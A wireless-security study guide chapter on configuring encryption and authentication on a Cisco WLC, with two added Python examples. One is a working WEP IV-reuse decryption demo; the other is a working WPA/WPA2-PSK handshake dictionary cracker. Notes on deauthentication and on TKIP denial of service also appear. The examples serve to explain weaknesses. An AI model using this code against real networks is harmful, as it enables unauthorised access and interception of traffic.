Configuring Encryption and Authentication on Lightweight Access Points

In this section, you will learn how to navigate through the GUI of a WLC (Cisco WLC2006, specifically) to configure encryption and authentication on a lightweight AP (Cisco AP1020, specifically). The specific tasks shown are configuring open authentication, static WEP authentication, WPA with PSK, web authentication, and 802.1x authentication.

Open Authentication

Open authentication means that you are interested neither in authenticating the client/user nor in encrypting the data exchanged between the wireless client and the network: anyone in radio range can associate, and anyone in range can read the traffic. This type of setting is often used in public places or hotspots such as airports, hotels, and lobbies for guest wireless access (to the Internet, for example). To set up open authentication, open a web browser page to your WLAN controller (using its name or IP address), log on, and click on the WLAN option on the main toolbar.

After you are on the WLAN page, you can set up a new wireless LAN by clicking on New or change the settings on an existing WLAN by clicking on Edit beside the name of an existing WLAN. The default method for authentication is 802.1x. This protects your WLAN against accidentally setting it up with open authentication. Figure 9-7 shows the page that you will see if you choose to modify an existing WLAN by clicking on Edit.

Figure 9-7 Configuring Open Authentication



As you can see in Figure 9-7, on the right side of the WLAN > Edit page is a drop-down list with the title Layer 2 Security under the Security Policies section. To set up for open authentication, you must select None from the drop-down list. (Remember that the default is 802.1x.)

Static WEP Authentication

To set up a WLAN for static WEP authentication, you must go to the WLAN > Edit page. On the right side of this page, in the Security Policies section, select Static WEP from the Layer 2 Security drop-down list. After you select this option, the Static WEP options are displayed on the bottom of this page. (See Figure 9-8.)

Figure 9-8 Configuring Static WEP Authentication


As you can see in Figure 9-8, a section with the Static WEP Parameters heading is displayed on the bottom of the WLAN > Edit page. You can configure up to four keys using the Key Index drop-down list. For each key, you can select its size from the Key Size drop-down list. In the Encryption Key box, you can type the value for each key. For each key, you can select ASCII or HEX as the key format from the Key Format drop-down list. Note that each WLAN is associated with only one key index; therefore, with a maximum of four key indexes available from the drop-down list, you can set up a maximum of four wireless LANs with the Static WEP option. Keep in mind that the key is the same for every client and every frame, and only the 24-bit IV changes per frame; the "Foundation Summary" later in this topic lists the resulting shortcomings of WEP.
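To see concretely why a static WEP key is weak regardless of the Key Size chosen above (and why the "Foundation Summary" later in this topic says WEP keys can be recovered from captured traffic), here is an added example. It is not code from the original page or from Cisco; it models WEP's use of RC4 with a 24-bit IV, and the static key, IV, and frame contents are constructed for the demonstration. It shows that two frames encrypted under the same IV share a keystream, so known plaintext in one frame (every IP frame starts with the same LLC/SNAP header) reveals the other frame without touching the key, and it computes how few frames are needed before an IV repeats.

```python
"""WEP keystream reuse under a 24-bit IV.

Added example, not code from the original page or from Cisco: a minimal
RC4/WEP model showing why a static WEP key (the Key Index / Key Size /
Encryption Key fields on the WLAN > Edit page) cannot protect traffic.
The key, IV and frame contents below are constructed for the demonstration.
"""
import math


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA), the cipher WEP wraps around a static key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(static_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-frame key is IV (24 bits, sent in the clear) || static key
    (40 or 104 bits). Returns IV || ciphertext; the CRC-32 ICV is left out
    because it adds no confidentiality."""
    if len(iv) != 3 or len(static_key) not in (5, 13):
        raise ValueError("IV must be 3 bytes, key 5 (40-bit) or 13 (104-bit) bytes")
    return iv + xor(plaintext, rc4(iv + static_key, len(plaintext)))


# Every IP-over-802.11 frame starts with this LLC/SNAP header, so an attacker
# always has 8 bytes of known plaintext per frame.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_from_iv_reuse(frame_a: bytes, known_plain_a: bytes, frame_b: bytes) -> bytes:
    """Two frames encrypted under the same IV share one RC4 keystream, so
    C_a xor C_b = P_a xor P_b. Knowing P_a (even partially) exposes P_b
    at the same byte positions, without ever learning the WEP key."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs: no keystream reuse to exploit")
    keystream = xor(frame_a[3:], known_plain_a)
    return xor(frame_b[3:], keystream)


def frames_until_iv_collision(p: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: frames before two randomly chosen IVs repeat with
    probability p. Cards that count IVs from zero after a reset repeat far
    sooner than this."""
    return math.ceil(math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - p))))


def demo() -> bytes:
    """Sniff two frames that reuse an IV; use the known one to read the other."""
    key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit static key
    iv = bytes.fromhex("3fa1c2")                         # constructed 24-bit IV
    plain_a = LLC_SNAP_IP + b"GET /index.html HTTP/1.0\r\n"   # frame the attacker can guess or inject
    plain_b = LLC_SNAP_IP + b"user=alice&pass=hunter2\r\n"    # victim's frame under the same IV
    frame_a = wep_encrypt(key, iv, plain_a)
    frame_b = wep_encrypt(key, iv, plain_b)
    return recover_from_iv_reuse(frame_a, plain_a, frame_b)


if __name__ == "__main__":
    print(demo())
    print("frames for a 50% IV collision:", frames_until_iv_collision())
```

The birthday bound comes out at a few thousand frames for a 50% chance of an IV repeat, which a busy client produces in seconds; with a full keystream recovered for one IV, every later frame under that IV can be decrypted or forged, which is the ground for the "WEP keys can be recovered" and "packet modification" caveats elsewhere in this topic.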

WPA Preshared Key

WPA PSK authentication is also configured on the WLAN > Edit page. From the Layer 2 Security drop-down list under the Security Policies section, you must select WPA (or WPA1 + WPA2 depending on your software version). If you select the WPA1 + WPA2 (or WPA) option, the appropriate fields for setting up the WPA parameters are displayed on the bottom of the WLAN > Edit page, as shown in Figure 9-9.

Figure 9-9 Configuring WPA PSK


NOTE Please note that in the figure that is in the ONT courseware, WPA is chosen from the Layer 2 Security drop-down list, and the bottom of the page has a WPA Parameters section instead. The reason for the discrepancy between Figure 9-9 of this topic and the figure that is in the ONT courseware is the software version difference on the wireless controller.

To set up for WPA PSK, under the WPA1 + WPA2 Parameters section, you must select the WPA1 Policy check box. For WPA1 encryption, you can choose either the AES or TKIP check box. Next, from the Auth Key Mgmt drop-down list, you must select PSK. Finally, on the last line in the WPA1 + WPA2 Parameters section, you must type the PSK in the long text box provided. Note the PSK format drop-down list allows you to specify the format of the PSK as either ASCII or HEX.

NOTE Again, the figure in the ONT courseware shows that after you select WPA from the Layer 2 Security drop-down list, a WPA Parameters section displays on the bottom of the WLAN > Edit page. Within that section, you are asked to click and enable a Pre-Shared Key check box and then type a PSK in the long text box provided.

Web Authentication

To authenticate users through a web browser interface, you must configure web authentication and its corresponding parameters. When a user who has associated to the WLAN opens a web browser (HTTP), the WLC intercepts the request and presents a login page. The login page is customizable; you can configure the logos and the text on the login page. Web authentication is usually used for guest access; the data exchanged between the wireless client and the AP is not encrypted, nor is there a MIC or per-packet authentication. Therefore, the client is open to attacks such as packet modification and session hijacking (an attacker who spoofs the MAC and IP address of an authenticated client inherits its access). As of the writing of this topic, the web authentication feature is available on Cisco 4400 WLCs and Cisco Catalyst 6500 Wireless Service Modules (WiSM), but it is not available on Cisco 2000 WLCs or Cisco Integrated Services Routers wireless LAN controller modules. With web authentication, the maximum simultaneous authentication limit is 21; the total local web authentication user limit is 2500.

To set up web authentication, you must navigate to the WLAN > Edit page. Under Security Policies in the Layer 3 security section, you will find a Web Policy check box that you must enable (see Figure 9-10).

Figure 9-10 Configuring Web Authentication


Below the Web Policy check box, you must choose between the Authentication and Passthrough options. If you select Authentication, the users are prompted for a username and password when they attempt to access the network. The username and password are verified against the internal user database of the WLC; if no match is found, they are verified against an external RADIUS server if one is configured. If Passthrough is selected, the user is not prompted for a username and password; however, if the Email Input check box (which is beneath the Passthrough option) is enabled, the users are prompted for their e-mail address. The last option you have under Layer 3 security is selecting an access list from the Preauthentication ACL drop-down list; it is applied to the traffic exchanged between the wireless client and the WLC before the client has authenticated, so it should permit only what the login page needs (DHCP, DNS, and the login page itself).

To customize the login page for web authentication, you must click the Security option in the main toolbar. From the security options listed on the left side of this page, click the Web Login Page option. You are then presented with a page similar to the one shown in Figure 9-11.

NOTE In the ONT courseware, either because of a WLC hardware/software difference or because of typing error, you are asked to go to Management > Web Login Page instead of Security > Web Login Page.

Figure 9-11 Customizing the Web Login Page


As shown in Figure 9-11, on the Web Login Page, you have three choices for Web Authentication Type: Internal (Default), Customized (Downloaded), and External (Redirect to external server). If you choose the external or customized types, you must then enter a URL in the Redirect URL after login box below. Otherwise, if you want the default authentication page of the WLC, select the Internal (Default) option. The other options you have are selecting to show or hide the Cisco logo, and entering a headline and a message. An example headline would end in "... Wireless Network," and an example message would be "Access is only offered to authorized users. Please enter your username and password."

802.1x Authentication

802.1x authentication is the default setting. To change the setting from other options back to 802.1x, you must navigate to the WLAN > Edit page and select 802.1x from the Layer 2 Security drop-down list under the Security Policies section. After you select this option, on the bottom of the WLAN > Edit page, a section with the 802.1x Parameters heading is displayed (see Figure 9-12).

Figure 9-12 802.1x Authentication


Under the 802.1x Parameters section, you are presented with a drop-down list giving you a choice of None, 40 bits, 104 bits, or 128 bits of WEP encryption for 802.11 data (these are dynamic WEP keys delivered per client after EAP authentication, not the static keys of the previous section). Note that the 802.11 standard only supports 40/64-bit and 104/128-bit keys; 128/152-bit keys are only supported by 802.11i, WPA, and WPA2-compliant clients. It is also important to note that Microsoft Windows XP clients only support 40-bit and 104-bit WEP keys.

From the Layer 2 Security drop-down list under the Security Policies section, you can also select WPA1 + WPA2. As stated earlier, on some hardware/software, WPA and WPA2 might be presented as separate options. If you intend to use WPA with 802.1x, select the WPA1 + WPA2 (or WPA) option. In response, the WLAN > Edit page displays the WPA1 + WPA2 Parameters section on the bottom, as shown in Figure 9-13.

Figure 9-13 WPA with 802.1x


Next, under the WPA1 + WPA2 Parameters section, enable the WPA1 Policy check box and choose the AES or TKIP check box for WPA1 encryption. Finally, make sure you choose 802.1x (not PSK) from the Auth Key Mgmt drop-down list so that the RADIUS server performs authentication.

To configure a WLAN for WPA2 security with dynamic keys, from the Layer 2 Security dropdown list under the Security Policies section, select WPA1 + WPA2. (On some hardware/ software, WPA and WPA2 might be presented as separate options.) In response, the WLAN > Edit page displays the WPA1 + WPA2 Parameters section on the bottom, as shown in Figure 9-14.

Figure 9-14 WPA2 with Dynamic Keys


Next, under the WPA1 + WPA2 Parameters section, enable the WPA2 Policy check box and choose the AES or TKIP check box for WPA2 encryption. Finally, make sure you choose 802.1x (not PSK) from the Auth Key Mgmt drop-down list so that the RADIUS server performs authentication.

If you enable both the WPA1 Policy and the WPA2 Policy check boxes, you are effectively setting up your WLAN for WPA compatibility mode. WPA compatibility mode supports both WPA and WPA2 clients and allows them to use the same SSID. Selecting both AES and TKIP for WPA2 Encryption allows support of legacy hardware that does support WPA2 but not AES.

NOTE In the ONT courseware, it shows that you can select WPA2 from the Layer 2 Security drop-down list under the Security Policies section (instead of WPA1 + WPA2); this is because of a hardware/software difference. Next, the ONT courseware states that a section titled WPA2 Parameters appears on the bottom of the WLAN > Edit page. In the WPA2 Parameters section, you are then presented with the choice of enabling any of the following three options:

■ WPA2 Compatibility Mode

■ Allow WPA2 TKIP Clients

■ Pre-Shared Key

This note has been added so that you are prepared for a possible question in the certification exam, should it be based on software/hardware variances.

Foundation Summary

The "Foundation Summary" is a collection of information that provides a convenient review of many key concepts in this topic. If you are already comfortable with the material in this topic, this summary can help you recall a few details. If you just read this topic, this review should help solidify some key facts. If you are doing your final preparation before the exam, the information in this section is a convenient way to review the day before the exam.

Following are the traditional wireless local-area network (WLAN) security issues:

■ Reliance on Service Set Identifier (SSID) as a security feature

■ Vulnerability to rogue access points (AP)

■ Reliance on MAC filters as a security feature

■ Usage of Wired Equivalent Privacy (WEP)

Following are the shortcomings of WEP:

■ The distribution of WEP keys to clients is not scalable.

■ WEP keys can be recovered if enough data is captured; the 24-bit IV does not prevent this, because IVs repeat and weak IVs leak key bytes.

■ WEP is vulnerable to dictionary attacks.

■ WEP does not provide protection against rogue APs.

The main features and benefits of 802.1x/EAP are as follows:

■ Usage of RADIUS server for AAA centralized authentication

■ Mutual authentication between the client and the authentication server

■ Ability to use 802.1x with multiple encryption algorithms, such as Advanced Encryption Standard (AES), Wi-Fi Protected Access (WPA), Temporal Key Integrity Protocol (TKIP), and WEP

■ Without user intervention, the ability to use dynamic (instead of static) WEP keys

■ Support of roaming

Following are the required components for 802.1x authentication:

■ EAP-capable client (the supplicant)

■ 802.1x-capable AP (the authenticator)

■ EAP-capable RADIUS server (the authentication server)

Table 9-3 displays important features of the main EAP variants discussed in this topic.

Table 9-3 Comparison of Main EAP Variants

User authentication database and server:

■ Cisco LEAP: Windows NT domains, Active Directory

■ EAP-FAST: Windows NT domains, Active Directory, LDAP (limited)

■ EAP-TLS: OTP, LDAP, Novell NDS, Windows NT domains, Active Directory

■ PEAP-GTC: OTP, LDAP, Novell NDS, Windows NT domains, Active Directory

■ PEAP-MSCHAPv2: Windows NT domains, Active Directory

Feature                                         Cisco LEAP   EAP-FAST   EAP-TLS   PEAP-GTC   PEAP-MSCHAPv2
Requires server certificates                    No           No         Yes       Yes        Yes
Requires client certificates                    No           No         Yes       No         No
Able to use single sign-on using Windows login  Yes          Yes        Yes       No         Yes
Works with fast secure roaming                  Yes          Yes        No        No         No
Works with WPA and WPA2                         Yes          Yes        Yes       Yes        Yes

Following are the most important features/components of WPA:

■ Authenticated key management—WPA performs authentication using either IEEE 802.1x or preshared key (PSK) prior to the key management phase.

■ Unicast and broadcast key management—After successful user authentication, message integrity and encryption keys are derived, distributed, validated, and stored on the client and the AP.

■ Utilization of TKIP and MIC—Temporal Key Integrity Protocol (TKIP) and Message Integrity Check (MIC) are both elements of the WPA standard. TKIP's per-packet key mixing removes the weak-key problem of WEP, and the MIC (together with a sequence counter) detects forged and replayed frames, which WEP's CRC-32 ICV cannot.

■ Initialization vector space expansion—WPA provides per-packet keying (PPK) via initialization vector (IV) hashing and broadcast key rotation. The IV is expanded from 24 bits (as in 802.11 WEP) to 48 bits.

The main shortcomings and issues of WPA are as follows:

■ Even though WPA uses TKIP, which is an enhancement to 802.11 WEP, it relies on the RC4 encryption. (RC4 has known shortcomings.)

■ WPA requires AP firmware support, software driver support for wireless cards, and operating system support (or a supplicant client). It is not guaranteed that the manufacturers of all these components that you own will release upgrades to support WPA.

■ WPA is susceptible to a specific denial of service (DoS) attack: if an AP detects two MIC failures within 60 seconds, the TKIP countermeasures shut down the basic service set for one minute (clients are deauthenticated and new TKIP associations are refused). An attacker needs only two forged frames to trigger this.

■ If short, noncomplex PSKs are used instead of 802.1x/EAP, an attacker who captures the four-way handshake can recover the PSK with an offline dictionary attack. The PSK derivation is salted only with the SSID, so guesses can even be precomputed for common SSIDs.
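The dictionary attack in the last item, and the ASCII-versus-HEX PSK format mentioned in the WPA Preshared Key section earlier in this topic, come down to the same arithmetic. The following is an added example, not code from the original page or from Cisco: it derives the 256-bit PSK from an ASCII passphrase the way a WPA/WPA2-Personal client does (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), derives the PTK with the 802.11i PRF-512, builds message 2 of the four-way handshake with its MIC, and then recovers the passphrase from that one captured frame with a small wordlist. The SSID, passphrase, MAC addresses, nonces and wordlist are constructed for the demonstration; the EAPOL-Key frame omits the RSN IE a real message 2 carries.

```python
"""WPA/WPA2-Personal: passphrase -> PSK, then an offline dictionary attack on
a captured 4-way handshake.

Added example, not code from the original page or from Cisco. The SSID,
passphrase, MAC addresses, nonces and wordlist are constructed here; the
algorithms are those of IEEE 802.11i / WPA: PBKDF2-HMAC-SHA1 (4096 rounds,
SSID as salt) for the PSK, PRF-512 for the PTK, and an HMAC over the
EAPOL-Key frame for the MIC. Only message 2 of the handshake is modelled.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def psk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """The ASCII passphrase typed in the PSK box becomes this 256-bit value;
    entering it as 64 hex digits (PSK Format = HEX) gives the same key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public handshake values (AP and client MAC,
    ANonce, SNonce). Everything except the PMK is visible to a sniffer."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes, key_desc_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with the MIC field zeroed. Version 1
    (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/AES-CCMP) uses HMAC-SHA1
    truncated to 16 bytes. The KCK is the first 128 bits of the PTK."""
    if key_desc_version == 1:
        return hmac.new(kck, frame, hashlib.md5).digest()
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_info: int = 0x010A, key_data: bytes = b"") -> bytes:
    """Handshake message 2 (client -> AP) with the MIC field zeroed. A real
    frame carries the client's RSN IE in key_data; it is left empty here."""
    body = bytes([2])                                              # descriptor type 2 = RSN
    body += key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")  # key info, key length
    body += (1).to_bytes(8, "big")                                 # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)               # nonce, key IV, RSC, key ID
    body += bytes(16)                                              # MIC (zero until signed)
    body += len(key_data).to_bytes(2, "big") + key_data
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body     # 802.1X v1, type EAPOL-Key


def with_mic(frame: bytes, mic: bytes) -> bytes:
    """Return the frame with its 16-byte MIC field replaced."""
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist, key_desc_version=2):
    """Recompute the MIC for each candidate passphrase; a match means the
    candidate is the PSK. Cost per guess is dominated by the 4096 PBKDF2
    rounds, which is why short, common passphrases fall quickly."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = with_mic(msg2, bytes(16))
    for candidate in wordlist:
        kck = derive_ptk(psk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_desc_version), captured_mic):
            return candidate
    return None


def demo(wordlist=("letmein", "Welcome1", "password1", "correct horse battery staple")):
    """Build a handshake as the real client would, then attack it offline."""
    ssid, passphrase = "corp-guest", "password1"                            # constructed weak PSK
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # fixed for reproducibility
    kck = derive_ptk(psk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_eapol_msg2(snonce)
    msg2 = with_mic(msg2, eapol_mic(kck, msg2, 2))                         # client signs message 2
    return crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("hex PSK for the WLC PSK box:", psk_from_passphrase("password1", "corp-guest").hex())
    print("recovered passphrase:", demo())
```

Note that the attacker never needs to be on the network: message 2 alone (client MAC, SNonce, MIC) plus the ANonce from message 1 is enough, and a deauthentication frame forces a client to redo the handshake on demand. This is why the Auth Key Mgmt setting of 802.1x rather than PSK, or at least a long random passphrase, matters on a WPA1 + WPA2 WLAN.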

Following are the key features of WPA2:

■ It uses 802.1x for authentication. (It also supports PSKs.)

■ It uses a similar method of key distribution and key renewal to WPA.

■ It supports Proactive Key Caching (PKC).

■ It uses Intrusion Detection System (IDS).

WPA and WPA2 have two modes: Enterprise mode and Personal mode. Each mode has encryption support and user authentication. Table 9-4 displays the authentication and encryption methods that WPA and WPA2 use in Enterprise and Personal modes.

Table 9-4 WPA/WPA2 Enterprise and Personal Modes

Mode

WPA

WPA2

Enterprise mode

Authentication: IEEE 802.1x/EAP Encryption: TKIP/MIC

Authentication: IEEE 802.1x/EAP Encryption: AES-CCMP

Personal mode

Authentication: PSK Encryption: TKIP/MIC

Authentication: PSK Encryption: AES-CCMP

Following are some of the issues that an enterprise must consider while evaluating and deciding to migrate to WPA2:

■ The wireless client (supplicant) must have a WPA2 driver that is EAP compatible.

■ The RADIUS server must support EAP.

■ Because WPA2 is more CPU-intensive than WPA (mostly due to usage of AES encryption), hardware upgrades are often required (rather than just a firmware upgrade).

■ Some older devices cannot be upgraded, so they might need to be replaced.

To set up or change the authentication and encryption settings for your WLANs (served by lightweight APs), open a web browser page to your WLAN controller (using its name or IP address), log on, and click on the WLAN option on the main toolbar. Next, click on Edit for an existing WLAN; the WLAN > Edit page appears. The Security Policies section on the WLAN > Edit page allows you to set up the Layer 2 and Layer 3 security settings.
